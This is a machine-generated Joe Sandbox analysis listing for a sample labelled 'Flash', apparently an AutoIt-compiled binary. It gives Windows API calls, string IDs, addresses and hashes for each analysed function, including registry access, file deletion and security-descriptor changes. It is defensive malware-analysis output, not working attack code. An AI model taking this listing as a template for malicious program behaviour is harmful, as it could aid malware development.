                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: d6ed7285d4caae4d59be42f95e4863e512a4b4eabc331c2778c8d372caef0e7a
                                                        • Instruction ID: 62fee69655ca09f1fcead5fc02a6b3f40fc125277dfb26764272f09481c551fb
                                                        • Opcode Fuzzy Hash: d6ed7285d4caae4d59be42f95e4863e512a4b4eabc331c2778c8d372caef0e7a
                                                        • Instruction Fuzzy Hash: FD419D7280025DAACF15FBE1DE96EEEB379AF94340F100525F601B2092EB756F49CB60
                                                        APIs
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A3AA0E
                                                        • GetDriveTypeW.KERNEL32 ref: 00A3AA5B
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A3AAA3
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A3AADA
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A3AB08
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 7cacaeabfab7ec4e7e2283ca676cd78403f89f34048a3fac920e53fb8c6495ab
                                                        • Instruction ID: 969c3dfd7dc83b504db445f4b234d4e9355577cfa2954ecd258c37a1c6b74d81
                                                        • Opcode Fuzzy Hash: 7cacaeabfab7ec4e7e2283ca676cd78403f89f34048a3fac920e53fb8c6495ab
                                                        • Instruction Fuzzy Hash: 90515C711043459FC701EF21C881E6AB3F9FF98758F10892DF896972A2DB31AE05CB52
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A3A852
                                                        • __swprintf.LIBCMT ref: 00A3A874
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A3A8B1
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A3A8D6
                                                        • _memset.LIBCMT ref: 00A3A8F5
                                                        • _wcsncpy.LIBCMT ref: 00A3A931
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A3A966
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A3A971
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00A3A97A
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A3A984
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: de54a2489d303769222e749bcb585c7dde33530b83e2d1e88fa7ff7aea54dbca
                                                        • Instruction ID: 68849c0bb856fc3ec398f093ef4a8dd736517a51bae37d82bc392d3f89af9ac4
                                                        • Opcode Fuzzy Hash: de54a2489d303769222e749bcb585c7dde33530b83e2d1e88fa7ff7aea54dbca
                                                        • Instruction Fuzzy Hash: 8531A371500119ABDB21DFA0DC49FFB73BCEF89700F1041B6F649D6160E77496858B25
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A5982C,?,?), ref: 00A5C0C8
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C0DF
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C0EA
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C0F7
                                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C100
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C10F
                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C118
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C11F
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A5982C,?,?,00000000,?), ref: 00A5C130
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A63C7C,?), ref: 00A5C149
                                                        • GlobalFree.KERNEL32(00000000), ref: 00A5C159
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00A5C17D
                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A5C1A8
                                                        • DeleteObject.GDI32(00000000), ref: 00A5C1D0
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A5C1E6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 3284a4ecd38d8174eb4e275ea90c3c5727f8d52392e6c92c43ed3a3f72efc26b
                                                        • Instruction ID: 4f91a7f82229523a874c0501fec8ba2f342b64c7c842f02a512e293355b51474
                                                        • Opcode Fuzzy Hash: 3284a4ecd38d8174eb4e275ea90c3c5727f8d52392e6c92c43ed3a3f72efc26b
                                                        • Instruction Fuzzy Hash: 6C413B75500204AFCB21DFA4DC48EAB7BB8FF89722F104158F906D72A0DBB09985DB60
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A5C8A4
                                                        • GetFocus.USER32 ref: 00A5C8B4
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00A5C8BF
                                                        • _memset.LIBCMT ref: 00A5C9EA
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A5CA15
                                                        • GetMenuItemCount.USER32(?), ref: 00A5CA35
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00A5CA48
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A5CA7C
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A5CAC4
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A5CAFC
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A5CB31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 8a2a84f642c89cfe08dcacc1edfe156e14207b57b637d7a783cc5a8688c40ef8
                                                        • Instruction ID: 5561d7d1c3a73172f3ab8b0dd17dbabeb3302cc4e739d23a9750c95ebd1b005c
                                                        • Opcode Fuzzy Hash: 8a2a84f642c89cfe08dcacc1edfe156e14207b57b637d7a783cc5a8688c40ef8
                                                        • Instruction Fuzzy Hash: 1E817C70208305AFDB10CF14D985E6BBBE9FB88765F00491EFE95A7291C770D949CBA2
                                                        APIs
                                                          • Part of subcall function 00A28E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A28E3C
                                                          • Part of subcall function 00A28E20: GetLastError.KERNEL32(?,00A28900,?,?,?), ref: 00A28E46
                                                          • Part of subcall function 00A28E20: GetProcessHeap.KERNEL32(00000008,?,?,00A28900,?,?,?), ref: 00A28E55
                                                          • Part of subcall function 00A28E20: HeapAlloc.KERNEL32(00000000,?,00A28900,?,?,?), ref: 00A28E5C
                                                          • Part of subcall function 00A28E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A28E73
                                                          • Part of subcall function 00A28EBD: GetProcessHeap.KERNEL32(00000008,00A28916,00000000,00000000,?,00A28916,?), ref: 00A28EC9
                                                          • Part of subcall function 00A28EBD: HeapAlloc.KERNEL32(00000000,?,00A28916,?), ref: 00A28ED0
                                                          • Part of subcall function 00A28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A28916,?), ref: 00A28EE1
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A28B2E
                                                        • _memset.LIBCMT ref: 00A28B43
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A28B62
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A28B73
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A28BB0
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A28BCC
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A28BE9
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A28BF8
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A28BFF
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A28C20
                                                        • CopySid.ADVAPI32(00000000), ref: 00A28C27
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A28C58
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A28C7E
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A28C92
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 9835df25ad1f32ff55cf3b20a6a7a0420fd0cf4f8d20d332f57a7407eca4c740
                                                        • Instruction ID: 06eec7e700a1640a6f35040d373256947fb08ab22f8d5b63b0fea03bdb4f0161
                                                        • Opcode Fuzzy Hash: 9835df25ad1f32ff55cf3b20a6a7a0420fd0cf4f8d20d332f57a7407eca4c740
                                                        • Instruction Fuzzy Hash: 126169B1901219EFDF11DFA9EE44EEEBB79FF04300F048169F915A6290DB799A05CB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A47A79
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A47A85
                                                        • CreateCompatibleDC.GDI32(?), ref: 00A47A91
                                                        • SelectObject.GDI32(00000000,?), ref: 00A47A9E
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A47AF2
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A47B2E
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A47B52
                                                        • SelectObject.GDI32(00000006,?), ref: 00A47B5A
                                                        • DeleteObject.GDI32(?), ref: 00A47B63
                                                        • DeleteDC.GDI32(00000006), ref: 00A47B6A
                                                        • ReleaseDC.USER32(00000000,?), ref: 00A47B75
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: be40109f6dc0070cb6b8b8ff6d37f9659e9d9b81795f5fa62f7691f8b276d47a
                                                        • Instruction ID: 4ffbe29fb36f3ec0cd5a3d79610e2de64b7f0ed317931ae79594d892cac4c184
                                                        • Opcode Fuzzy Hash: be40109f6dc0070cb6b8b8ff6d37f9659e9d9b81795f5fa62f7691f8b276d47a
                                                        • Instruction Fuzzy Hash: 80515775904349EFCB15CFA8DC84EAFBBB9EF88350F14842DF94AA7210D771A9418B60
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A3A4D4
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00A3A4F6
                                                        • __swprintf.LIBCMT ref: 00A3A54F
                                                        • __swprintf.LIBCMT ref: 00A3A568
                                                        • _wprintf.LIBCMT ref: 00A3A61E
                                                        • _wprintf.LIBCMT ref: 00A3A63C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-2391861430
                                                        • Opcode ID: 6e797492a0947b92e6a3c2ffd065590e23ff0c73b3fca71f586d4ea2945c1693
                                                        • Instruction ID: c0d09b76680c55552b21f35611706db4e186d25a7325b4a6291e6d896d8a2809
                                                        • Opcode Fuzzy Hash: 6e797492a0947b92e6a3c2ffd065590e23ff0c73b3fca71f586d4ea2945c1693
                                                        • Instruction Fuzzy Hash: F951AB71900159BBCF16EBE0CD46FEEB779AF54340F204566F505A20A2EB312F58CB61
                                                        APIs
                                                          • Part of subcall function 00A3951A: __time64.LIBCMT ref: 00A39524
                                                          • Part of subcall function 009E4A8C: _fseek.LIBCMT ref: 009E4AA4
                                                        • __wsplitpath.LIBCMT ref: 00A397EF
                                                          • Part of subcall function 009F431E: __wsplitpath_helper.LIBCMT ref: 009F435E
                                                        • _wcscpy.LIBCMT ref: 00A39802
                                                        • _wcscat.LIBCMT ref: 00A39815
                                                        • __wsplitpath.LIBCMT ref: 00A3983A
                                                        • _wcscat.LIBCMT ref: 00A39850
                                                        • _wcscat.LIBCMT ref: 00A39863
                                                          • Part of subcall function 00A39560: _memmove.LIBCMT ref: 00A39599
                                                          • Part of subcall function 00A39560: _memmove.LIBCMT ref: 00A395A8
                                                        • _wcscmp.LIBCMT ref: 00A397AA
                                                          • Part of subcall function 00A39CF1: _wcscmp.LIBCMT ref: 00A39DE1
                                                          • Part of subcall function 00A39CF1: _wcscmp.LIBCMT ref: 00A39DF4
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A39A0D
                                                        • _wcsncpy.LIBCMT ref: 00A39A80
                                                        • DeleteFileW.KERNEL32(?,?), ref: 00A39AB6
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A39ACC
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A39ADD
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A39AEF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 7d46a18c27b18b0ba75cc7d6c73e51c92a01535ee6b3c6c27e8e56786b3ee192
                                                        • Instruction ID: a21a2ed1b98032a981673f92ff6da44b98aacb4485aed6d15e1bca42873fb810
                                                        • Opcode Fuzzy Hash: 7d46a18c27b18b0ba75cc7d6c73e51c92a01535ee6b3c6c27e8e56786b3ee192
                                                        • Instruction Fuzzy Hash: EDC11CB1D0021DAADF11DFA5CC85ADFBBBDAF85310F0040AAF609E6151EB709A858F65
                                                        APIs
                                                        • _memset.LIBCMT ref: 009E5BF1
                                                        • GetMenuItemCount.USER32(00A97890), ref: 00A20E7B
                                                        • GetMenuItemCount.USER32(00A97890), ref: 00A20F2B
                                                        • GetCursorPos.USER32(?), ref: 00A20F6F
                                                        • SetForegroundWindow.USER32(00000000), ref: 00A20F78
                                                        • TrackPopupMenuEx.USER32(00A97890,00000000,?,00000000,00000000,00000000), ref: 00A20F8B
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A20F97
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 2751501086-0
                                                        • Opcode ID: 1e4ec6c8a6c4111e15f09226aae37094743ef96ad92ae905c3d6f6ec61ba1631
                                                        • Instruction ID: 05b825164f68dcb6916d299da66aab6895720f4d4f1887e234bc299d91092fb0
                                                        • Opcode Fuzzy Hash: 1e4ec6c8a6c4111e15f09226aae37094743ef96ad92ae905c3d6f6ec61ba1631
                                                        • Instruction Fuzzy Hash: 96713770644715BFEB218F59DC45FAABF64FF04728F244226F524A61D1C7B06C90DB90
                                                        APIs
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        • _memset.LIBCMT ref: 00A28489
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A284BE
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A284DA
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A284F6
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A28520
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00A28548
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A28553
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A28558
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: 03c4c330b54b0c2e30f7e3ca71fded55d7c09a9bb9cafe81d83c00d16a316b4d
                                                        • Instruction ID: b21f51f849f6ef437185d8dfeafe2af4115cdef8981ecd803e4b66c18ffc2482
                                                        • Opcode Fuzzy Hash: 03c4c330b54b0c2e30f7e3ca71fded55d7c09a9bb9cafe81d83c00d16a316b4d
                                                        • Instruction Fuzzy Hash: 43412672C1022DABCF12EBA4EC95EEEB778FF54340F004529F911A2261EA349E45CB90
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A5040D,?,?), ref: 00A51491
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: 65c66b8953437e1752cc6c7428816f2b0c8ccb3b700877d24e9c6f85c6796bf5
                                                        • Instruction ID: c85c3825db3e1811bdf48122ea410629df70fb922582322edfdcb8c75c599c64
                                                        • Opcode Fuzzy Hash: 65c66b8953437e1752cc6c7428816f2b0c8ccb3b700877d24e9c6f85c6796bf5
                                                        • Instruction Fuzzy Hash: CB41343050025A8BDF11EF90D881BFA3738BF91355F604565FDA65B2A3EB30AD1ACB60
                                                        APIs
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                          • Part of subcall function 009E153B: _memmove.LIBCMT ref: 009E15C4
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A358EB
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A35901
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A35912
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A35924
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A35935
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
